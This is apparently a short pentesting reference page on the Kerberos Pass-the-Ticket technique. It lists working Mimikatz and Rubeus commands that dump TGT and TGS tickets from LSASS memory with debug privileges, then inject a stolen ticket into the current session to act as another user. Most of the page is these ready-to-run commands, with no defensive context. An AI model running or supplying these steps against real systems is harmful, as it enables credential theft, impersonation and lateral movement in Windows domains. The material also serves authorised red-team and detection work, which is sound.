Pass The Ticket

It consists of using a Kerberos TGT or TGS ticket to perform authentication. The tickets are extracted by the LSASS process. Require administrator privileges to extract other people's tickets, otherwise only your own can be extracted.

Mimikatz

Ticket Extraction

.\mimikatz.exe 
> privilege::debug
> sekurlsa::tickets /export

File [randomvalue]-username@service-domain.kirbi, krbtgt service is TGT ticket.

Upload Ticket

Uploading ticket on the current session (like it was a cookie)

> kerberos::ptt "<FILE.kirbi>"

> misc::cmd

Rubeus

Ticket Extraction

Rubeus.exe dump /nowrap 
# printed in base64

Upload Ticket

Uploading ticket on the current session (like it was a cookie)

Rubeus.exe ptt /ticket:<BASE64_TICKET>

Rubeus.exe ptt /ticket:<FILE.kirbi>  # obtained from mimikatz

Last updated 10 months ago

Was this helpful?